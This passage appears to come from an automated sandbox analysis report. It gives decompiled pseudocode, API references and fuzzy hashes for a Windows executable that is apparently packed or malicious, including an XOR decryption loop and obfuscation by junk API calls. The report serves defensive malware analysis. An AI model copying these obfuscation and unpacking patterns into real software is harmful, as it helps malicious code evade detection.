                  				_t1798 = 0;
                  				do {
                  					if(_t1798 == 0x562d05) {
                  						_t1359 =  *0x4500f8; // 0x4263eb
                  						 *0x477aa0 = _t1359;
                  					}
                  					if( *0x477a9c == 0x3c) {
                  						FindResourceW(0, 0, 0);
                  					}
                  					_t1798 = _t1798 + 1;
                  				} while (_t1798 < 0x5f6c78);
                  				E0044CFD0(); // executed
                  				_pop(_t1794);
                  				_pop(_t1799);
                  				_pop(_t1681);
                  				if( *0x477a9c == 0xc) {
                  					FindResourceExW(0, 0, 0, 0);
                  					 *0x46f388 = 0xd25463be;
                  					 *0x46f38c = 0xffffffff;
                  				}
                  				return E004020C8(0, _t1681, _v8 ^ _t1800, _t1685, _t1794, _t1799);
                  				L12:
                  				_t1797 = _t1797 + 1;
                  				if(_t1797 < 0x3661b39c) {
                  					goto L7;
                  				} else {
                  				}
                  				goto L17;
                  			}
                  0x0044de4d
                  0x0044de9b
                  0x0044dea5
                  0x0044deaf
                  0x0044deca
                  0x0044dee5
                  0x0044deef
                  0x0044def9
                  0x0044df03
                  0x0044df0d
                  0x0044df28
                  0x0044df32
                  0x0044df3c
                  0x0044df68
                  0x0044df72
                  0x0044df7c
                  0x0044dfb9
                  0x0044dfc3
                  0x0044dfcd
                  0x0044dff9
                  0x0044e003
                  0x0044e00d
                  0x0044e017
                  0x0044e021
                  0x0044e02b
                  0x0044e035
                  0x0044e050
                  0x0044e05a
                  0x0044e064
                  0x0044e07f
                  0x0044e09a
                  0x0044e0a4
                  0x0044e0ae
                  0x0044e0b8
                  0x0044e0f5
                  0x0044e110
                  0x0044e12b
                  0x0044e135
                  0x0044e161
                  0x0044e18d
                  0x0044e197
                  0x0044e1a1
                  0x0044e1ab
                  0x0044e1b5
                  0x0044e1bf
                  0x0044e1da
                  0x0044e1e4
                  0x0044e1ee
                  0x0044e24d
                  0x0044e257
                  0x0044e272
                  0x0044e27c
                  0x0044e286
                  0x0044e290
                  0x0044e29a
                  0x0044e2a4
                  0x0044e2ae
                  0x0044e2b8
                  0x0044e2c2
                  0x0044e2cc
                  0x0044e2d6
                  0x0044e2f1
                  0x0044e2fb
                  0x0044e305
                  0x0044e30f
                  0x0044e319
                  0x0044e334
                  0x0044e360
                  0x0044e37b
                  0x0044e385
                  0x0044e38f
                  0x0044e399
                  0x0044e3a3
                  0x0044e3ad
                  0x0044e3c8
                  0x0044e3e3
                  0x0044e3ed
                  0x0044e3f7
                  0x0044e401
                  0x0044e40b
                  0x0044e448
                  0x0044e452
                  0x0044e45c
                  0x0044e466
                  0x0044e492
                  0x0044e49c
                  0x0044e4a6
                  0x0044e4b0
                  0x0044e4ba
                  0x0044e4c4
                  0x0044e4f0
                  0x0044e4fa
                  0x0044e515
                  0x0044e51f
                  0x0044e529
                  0x0044e5aa
                  0x0044e5c5
                  0x0044e602
                  0x0044e60c
                  0x0044e616
                  0x0044e642
                  0x0044e64c
                  0x0044e656
                  0x0044e660
                  0x0044e66a
                  0x0044e685
                  0x0044e68f
                  0x0044e699
                  0x0044e6a3
                  0x0044e6be
                  0x0044e6c8
                  0x0044e6e3
                  0x0044e6ed
                  0x0044e6f7
                  0x0044e701
                  0x0044e70b
                  0x0044e715
                  0x0044e71f
                  0x0044e729
                  0x0044e744
                  0x0044e74e
                  0x0044e758
                  0x0044e762
                  0x0044e77d
                  0x0044e787
                  0x0044e791
                  0x0044e7ac
                  0x0044e7c7
                  0x0044e7e2
                  0x0044e7ec
                  0x0044e7f6
                  0x0044e800
                  0x0044e81b
                  0x0044e836
                  0x0044e851
                  0x0044e85b
                  0x0044e865
                  0x0044e86f
                  0x0044e879
                  0x0044e883
                  0x0044e88d
                  0x0044e8b9
                  0x0044e8c3
                  0x0044e8cd
                  0x0044e8e8
                  0x0044e8f2
                  0x0044e8fc
                  0x0044e906
                  0x0044e910
                  0x0044e92b
                  0x0044e935
                  0x0044e93f
                  0x0044e949
                  0x0044e953
                  0x0044e95d
                  0x0044e967
                  0x0044e971
                  0x0044e97b
                  0x0044e985
                  0x0044e98f
                  0x0044e9aa
                  0x0044e9c5
                  0x0044e9e0
                  0x0044e9ea
                  0x0044e9f4
                  0x0044e9fe
                  0x0044ea08
                  0x0044ea12
                  0x0044ea1c
                  0x0044ea26
                  0x0044ea30
                  0x0044ea3a
                  0x0044ea55
                  0x0044ea5f
                  0x0044ea69
                  0x0044ea95
                  0x0044ea9f
                  0x0044eaba
                  0x0044ead5
                  0x0044eaf0
                  0x0044eafa
                  0x0044eb04
                  0x0044eb13
                  0x0044eb1f
                  0x0044eb29
                  0x0044eb33
                  0x0044eb3d
                  0x0044eb47
                  0x0044eb4d
                  0x0044eb50
                  0x0044eb56
                  0x0044eb58
                  0x0044eb5d
                  0x0044eb5d
                  0x0044eb69
                  0x0044eb71
                  0x0044eb71
                  0x0044eb73
                  0x0044eb74
                  0x0044eb7c
                  0x0044eb88
                  0x0044eb89
                  0x0044eb8a
                  0x0044eb8b
                  0x0044eb95
                  0x0044eb9b
                  0x0044eba5
                  0x0044eba5
                  0x0044ebbe
                  0x0044d4c1
                  0x0044d4c1
                  0x0044d4c8
                  0x00000000
                  0x00000000
                  0x0044d4ca
                  0x00000000

                  APIs
                  • lstrcpyW.KERNEL32 ref: 0044D46F
                  • SetConsoleTextAttribute.KERNEL32(00000000,00000000), ref: 0044D49D
                  • GetLastError.KERNEL32 ref: 0044D4A3
                  • FindResourceW.KERNEL32(00000000,00000000,00000000), ref: 0044EB71
                  • FindResourceExW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0044EB95
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: FindResource$AttributeConsoleErrorLastTextlstrcpy
                  • String ID: ;a$W$}$rh$6fL$ ?: $&8Z\$&on+$,qkN$-R^$29ws$3xm,$6VNm$@)S$BUsf$D&73$NUpV$O^a'$Tem$[>"T$a^Ze$c^cF$d3L{$eG:i$jCV]$o.`$v4Q3$xl_$~7]$7^U$X `$cB$e%{$rI$sI
                  • API String ID: 1504342148-1630852067
                  • Opcode ID: 82cd14788d8f1562def75839d789b28c4bd09bd65779f87903080d73cb57a6a7
                  • Instruction ID: 678a56bc0feb13c3e675f3174814d9e113a3e58f8e8ad76f3fc5e03a3e86f747
                  • Opcode Fuzzy Hash: 82cd14788d8f1562def75839d789b28c4bd09bd65779f87903080d73cb57a6a7
                  • Instruction Fuzzy Hash: 21C2BDB5E02369CBEBA48F1AC98579DF7B0BB16314F5481C9D44D6AA12CB309EC1CF46
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040B49D() {
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				WCHAR* _t1;
                  				void* _t5;
                  				void* _t18;
                  				WCHAR* _t20;
                  
                  				_t1 = GetEnvironmentStringsW();
                  				_t20 = _t1;
                  				if(_t20 != 0) {
                  					if( *_t20 != 0) {
                  						goto L3;
                  						do {
                  							do {
                  								L3:
                  								_t1 =  &(_t1[1]);
                  							} while ( *_t1 != 0);
                  							_t1 =  &(_t1[1]);
                  						} while ( *_t1 != 0);
                  					}
                  					_t13 = _t1 - _t20 + 2;
                  					_t5 = E00406CDA(_t1 - _t20 + 2); // executed
                  					_t18 = _t5;
                  					if(_t18 != 0) {
                  						E0040A5C0(_t13, _t18, _t20, _t18, _t20, _t13);
                  					}
                  					FreeEnvironmentStringsW(_t20);
                  					return _t18;
                  				} else {
                  					return 0;
                  				}
                  			}











                  APIs
                  • GetEnvironmentStringsW.KERNEL32(00000000,00402EE2), ref: 0040B4A0
                  • __malloc_crt.LIBCMT ref: 0040B4CE
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040B4DB
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: EnvironmentStrings$Free__malloc_crt
                  • String ID:
                  • API String ID: 237123855-0
                  • Opcode ID: 5d089b9637f73c897f2aab298f142f6db1b1887cb12ec00e205e8a8e481efc50
                  • Instruction ID: 0b88178ae0eafc877dd8b3f9d99c71b0064c159633a81baf3373b3dbcac13a0e
                  • Opcode Fuzzy Hash: 5d089b9637f73c897f2aab298f142f6db1b1887cb12ec00e205e8a8e481efc50
                  • Instruction Fuzzy Hash: 79F082366141216EDA2176756C4887B1668DAD6329316883BF9A6E3282F73C4E8342ED
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040B7EC(intOrPtr _a4) {
                  				void* _t6;
                  
                  				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                  				 *0x451064 = _t6;
                  				if(_t6 != 0) {
                  					 *0x477ae0 = 1;
                  					return 1;
                  				} else {
                  					return _t6;
                  				}
                  			}





                  APIs
                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040B801
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: CreateHeap
                  • String ID:
                  • API String ID: 10892065-0
                  • Opcode ID: 1da2d312b305f5ab6f0535fdbe77f7d377475ebadb6e435b4f47102c4b62afdb
                  • Instruction ID: eba4c41ffdfcecbf94b759f0d18a4aac9601aab7ac9ab40ed87857c2f36acec8
                  • Opcode Fuzzy Hash: 1da2d312b305f5ab6f0535fdbe77f7d377475ebadb6e435b4f47102c4b62afdb
                  • Instruction Fuzzy Hash: 4ED05E729543485AEB009F746C097673BDCD384795F108436F90DC66A0E774C980D588
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004066BD() {
                  				void* _t1;
                  
                  				_t1 = E0040664B(0); // executed
                  				return _t1;
                  			}





                  APIs
                  • __encode_pointer.LIBCMT ref: 004066BF
                    • Part of subcall function 0040664B: TlsGetValue.KERNEL32(00000000,?,004066C4,00000000,0041B4C4,00450B40,00000000,00000314,?,0040AF1A,00450B40,Microsoft Visual C++ Runtime Library,00012010), ref: 0040665D
                    • Part of subcall function 0040664B: TlsGetValue.KERNEL32(00000001,?,004066C4,00000000,0041B4C4,00450B40,00000000,00000314,?,0040AF1A,00450B40,Microsoft Visual C++ Runtime Library,00012010), ref: 00406674
                    • Part of subcall function 0040664B: RtlEncodePointer.NTDLL(00000000,?,004066C4,00000000,0041B4C4,00450B40,00000000,00000314,?,0040AF1A,00450B40,Microsoft Visual C++ Runtime Library,00012010), ref: 004066B2
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Value$EncodePointer__encode_pointer
                  • String ID:
                  • API String ID: 2585649348-0
                  • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                  • Instruction ID: bb74eaa002715f722a62abd881ac9de8af5e52d2c93518fcaa464a8ac363a2c9
                  • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  C-Code - Quality: 100%
                  			E0041C1B6(signed int __eax, void* __esi) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				char _v20;
                  				signed int _t142;
                  				signed int _t145;
                  				signed int _t148;
                  				signed int _t151;
                  				signed int _t154;
                  				signed int _t157;
                  				signed int _t159;
                  				signed int _t162;
                  				signed int _t165;
                  				signed int _t168;
                  				signed int _t171;
                  				signed int _t174;
                  				signed int _t177;
                  				signed int _t180;
                  				signed int _t183;
                  				signed int _t186;
                  				signed int _t189;
                  				signed int _t192;
                  				signed int _t195;
                  				signed int _t198;
                  				signed int _t201;
                  				signed int _t204;
                  				signed int _t207;
                  				signed int _t210;
                  				signed int _t213;
                  				signed int _t216;
                  				signed int _t219;
                  				signed int _t222;
                  				signed int _t225;
                  				signed int _t228;
                  				signed int _t231;
                  				signed int _t234;
                  				signed int _t237;
                  				signed int _t240;
                  				signed int _t243;
                  				signed int _t246;
                  				signed int _t249;
                  				signed int _t252;
                  				signed int _t255;
                  				signed int _t258;
                  				signed int _t261;
                  				signed int _t264;
                  				signed int _t267;
                  				signed int _t270;
                  				signed int _t276;
                  
                  				_t278 =  *(__eax + 0x42) & 0x0000ffff;
                  				_t279 =  *(__eax + 0x44) & 0x0000ffff;
                  				_v8 =  *(__eax + 0x42) & 0x0000ffff;
                  				_v12 =  *(__eax + 0x44) & 0x0000ffff;
                  				if(__esi != 0) {
                  					_v16 = _v16 & 0x00000000;
                  					_v20 = __eax;
                  					_t142 = E004113CD(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
                  					_t145 = E004113CD(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
                  					_t148 = E004113CD(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
                  					_t151 = E004113CD(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
                  					_t154 = E004113CD(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
                  					_t157 = E004113CD(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
                  					_t159 = E004113CD(_t279,  &_v20, 1, _v8, 0x37, __esi);
                  					_t162 = E004113CD(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
                  					_t165 = E004113CD(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
                  					_t168 = E004113CD(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
                  					_t171 = E004113CD(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
                  					_t174 = E004113CD(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
                  					_t177 = E004113CD(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
                  					_t180 = E004113CD(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
                  					_t183 = E004113CD(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
                  					_t186 = E004113CD(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
                  					_t189 = E004113CD(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
                  					_t192 = E004113CD(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
                  					_t195 = E004113CD(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
                  					_t198 = E004113CD(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
                  					_t201 = E004113CD(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
                  					_t204 = E004113CD(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
                  					_t207 = E004113CD(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
                  					_t210 = E004113CD(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
                  					_t213 = E004113CD(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
                  					_t216 = E004113CD(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
                  					_t219 = E004113CD(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
                  					_t222 = E004113CD(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
                  					_t225 = E004113CD(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
                  					_t228 = E004113CD(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
                  					_t231 = E004113CD(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
                  					_t234 = E004113CD(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
                  					_t237 = E004113CD(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
                  					_t240 = E004113CD(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
                  					_t243 = E004113CD(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
                  					_t246 = E004113CD(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
                  					_t249 = E004113CD(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
                  					_t252 = E004113CD(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
                  					_t255 = E004113CD(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
                  					_t258 = E004113CD(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
                  					_t261 = E004113CD(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
                  					_t264 = E004113CD(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
                  					_t267 = E004113CD(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
                  					_t276 = _v12;
                  					_t270 = E004113CD(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
                  					 *(__esi + 0xac) = _t276;
                  					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
                  				} else {
                  					return __eax | 0xffffffff;
                  				}
                  			}





















































                  APIs
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: ___getlocaleinfo
                  • String ID:
                  • API String ID: 1937885557-0
                  • Opcode ID: eeb3a2f53ef9cdb8a56b0496cffd97dcf9148b706d6982ce29c976e1b46872ee
                  • Instruction ID: 635302dd4953757cb4892d6e7891d79906223aa160e535d2bfe3280599565fbc
                  • Opcode Fuzzy Hash: eeb3a2f53ef9cdb8a56b0496cffd97dcf9148b706d6982ce29c976e1b46872ee
                  • Instruction Fuzzy Hash: 40E1ECB290025DBEFB11DBE1CC85EFFB7FDEB04348F10092BB615A2450EA74AA159760
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E004020C8(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                  				intOrPtr _v0;
                  				void* _v804;
                  				intOrPtr _v808;
                  				intOrPtr _v812;
                  				intOrPtr _t6;
                  				intOrPtr _t11;
                  				intOrPtr _t12;
                  				intOrPtr _t13;
                  				long _t17;
                  				intOrPtr _t21;
                  				intOrPtr _t22;
                  				intOrPtr _t25;
                  				intOrPtr _t26;
                  				intOrPtr _t27;
                  				intOrPtr* _t31;
                  				void* _t34;
                  
                  				_t27 = __esi;
                  				_t26 = __edi;
                  				_t25 = __edx;
                  				_t22 = __ecx;
                  				_t21 = __ebx;
                  				_t6 = __eax;
                  				_t34 = _t22 -  *0x44f0d4; // 0x45b66027
                  				if(_t34 == 0) {
                  					asm("repe ret");
                  				}
                  				 *0x4508c8 = _t6;
                  				 *0x4508c4 = _t22;
                  				 *0x4508c0 = _t25;
                  				 *0x4508bc = _t21;
                  				 *0x4508b8 = _t27;
                  				 *0x4508b4 = _t26;
                  				 *0x4508e0 = ss;
                  				 *0x4508d4 = cs;
                  				 *0x4508b0 = ds;
                  				 *0x4508ac = es;
                  				 *0x4508a8 = fs;
                  				 *0x4508a4 = gs;
                  				asm("pushfd");
                  				_pop( *0x4508d8);
                  				 *0x4508cc =  *_t31;
                  				 *0x4508d0 = _v0;
                  				 *0x4508dc =  &_a4;
                  				 *0x450818 = 0x10001;
                  				_t11 =  *0x4508d0; // 0x0
                  				 *0x4507cc = _t11;
                  				 *0x4507c0 = 0xc0000409;
                  				 *0x4507c4 = 1;
                  				_t12 =  *0x44f0d4; // 0x45b66027
                  				_v812 = _t12;
                  				_t13 =  *0x44f0d8; // 0xba499fd8
                  				_v808 = _t13;
                  				 *0x450810 = IsDebuggerPresent();
                  				_push(1);
                  				E0040CBFC(_t14);
                  				SetUnhandledExceptionFilter(0);
                  				_t17 = UnhandledExceptionFilter(0x47b310);
                  				if( *0x450810 == 0) {
                  					_push(1);
                  					E0040CBFC(_t17);
                  				}
                  				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                  			}




















                  APIs
                  • IsDebuggerPresent.KERNEL32 ref: 004035C6
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004035DB
                  • UnhandledExceptionFilter.KERNEL32(0047B310), ref: 004035E6
                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00403602
                  • TerminateProcess.KERNEL32(00000000), ref: 00403609
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                  • String ID:
                  • API String ID: 2579439406-0
                  • Opcode ID: 79554be0986bbfc098f73cd10f4684f9fcf3f170b892e3214e1fab69c80ac2b7
                  • Instruction ID: 9bcaa0f32cb8fc485e4d80af3835b2db55b8b8e1951e162ac425388e255cf3a9
                  • Opcode Fuzzy Hash: 79554be0986bbfc098f73cd10f4684f9fcf3f170b892e3214e1fab69c80ac2b7
                  • Instruction Fuzzy Hash: 1E21CDB9401348EFD750EF28EC49A453BF4FB08312F10453AE9089A3A2E7B499858F8D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E0044CEC0(intOrPtr __ebx, intOrPtr __edi) {
                  				signed int _v8;
                  				char _v1032;
                  				void* __esi;
                  				signed int _t6;
                  				intOrPtr _t11;
                  				intOrPtr _t14;
                  				intOrPtr _t15;
                  				void* _t17;
                  				intOrPtr _t18;
                  				signed int _t19;
                  
                  				_t15 = __edi;
                  				_t11 = __ebx;
                  				_t6 =  *0x44f0d4; // 0x45b66027
                  				_t7 = _t6 ^ _t19;
                  				_v8 = _t6 ^ _t19;
                  				_t17 = 0;
                  				if(__edi > 0) {
                  					do {
                  						 *(_t11 + _t17) =  *(_t11 + _t17) ^ E0044C2E0();
                  						if(_t15 == 0x19) {
                  							LCMapStringA(0, 0, 0, 0,  &_v1032, 0);
                  							_t7 = GetLocaleInfoW(0, 0, 0, 0);
                  						}
                  						_t17 = _t17 + 1;
                  					} while (_t17 < _t15);
                  				}
                  				_pop(_t18);
                  				if(_t15 == 0x1171) {
                  					 *0x477aa8 = 0xa62e7790;
                  					 *0x477aac = 0xffffffff;
                  				}
                  				return E004020C8(_t7, _t11, _v8 ^ _t19, _t14, _t15, _t18);
                  			}

                  APIs
                  • LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0044CEFE
                  • GetLocaleInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0044CF0C
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: InfoLocaleString
                  • String ID:
                  • API String ID: 486037378-0
                  • Opcode ID: 619383607ee049dc05d4e00ab56b632c32d44afbeebecdbe4beb42279178a16e
                  • Instruction ID: 114b3001312118b35cd6f7bf2c02fe3f80d556a2e317a1ba9087f93e9be93210
                  • Opcode Fuzzy Hash: 619383607ee049dc05d4e00ab56b632c32d44afbeebecdbe4beb42279178a16e
                  • Instruction Fuzzy Hash: 1E01493064230866F7209F98DD82B6E7765EB00710FA1017AEB18BF1C2CA741C44879C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 72%
                  			E0041E804(void* __eax, void* __ebx, void* __esi) {
                  				int _t12;
                  
                  				asm("o16 cmp al, 0xfe");
                  				 *((intOrPtr*)(__ebx - 0x2708fc18)) =  *((intOrPtr*)(__ebx - 0x2708fc18)) + 1;
                  				asm("sbb eax, eax");
                  				 *((intOrPtr*)(__esi + 0x14)) = __eax + 0xe9;
                  				_t12 = EnumSystemLocalesA(E0041E463, 1);
                  				if(( *(__esi + 8) & 0x00000004) == 0) {
                  					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
                  					return _t12;
                  				}
                  				return _t12;
                  			}

                  APIs
                  • EnumSystemLocalesA.KERNEL32(Function_0001E463,00000001), ref: 0041E81D
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: EnumLocalesSystem
                  • String ID:
                  • API String ID: 2099609381-0
                  • Opcode ID: ae6596e8c27d87f2aa3dc8e9cbc6aa4e60f818d3c1684a62d727b3b391829424
                  • Instruction ID: 24f49355001627ee36b76b95391cc27e21c4793ded948c33f21bcd425eb7a825
                  • Opcode Fuzzy Hash: ae6596e8c27d87f2aa3dc8e9cbc6aa4e60f818d3c1684a62d727b3b391829424
                  • Instruction Fuzzy Hash: C1D0A7709043018BE7200F35DA483E177E0FB00F15FB0994ECD82410C1C3B864CAC644
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0042207D(int _a4, int _a8, short* _a12, int _a16) {
                  
                  				return GetLocaleInfoW(_a4, _a8, _a12, _a16);
                  			}

                  APIs
                  • GetLocaleInfoW.KERNEL32(?,?,?,?), ref: 0042208E
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: InfoLocale
                  • String ID:
                  • API String ID: 2299586839-0
                  • Opcode ID: 0f7862010a24074c99781ce1d1a265cfbf4d8662de31cf92ab358c2c31a02ec2
                  • Instruction ID: 0604f42b9ad4708c9474dfd5ec34d9a215fb4240b3d3f15be454cbda2f74cc8a
                  • Opcode Fuzzy Hash: 0f7862010a24074c99781ce1d1a265cfbf4d8662de31cf92ab358c2c31a02ec2
                  • Instruction Fuzzy Hash: 97C0023200024DBB8F025F81ED0889A3F2AEB88260B044014FA2C0502087329971AB95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040AD9D() {
                  
                  				SetUnhandledExceptionFilter(E0040AD5B);
                  				return 0;
                  			}

                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000AD5B), ref: 0040ADA2
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
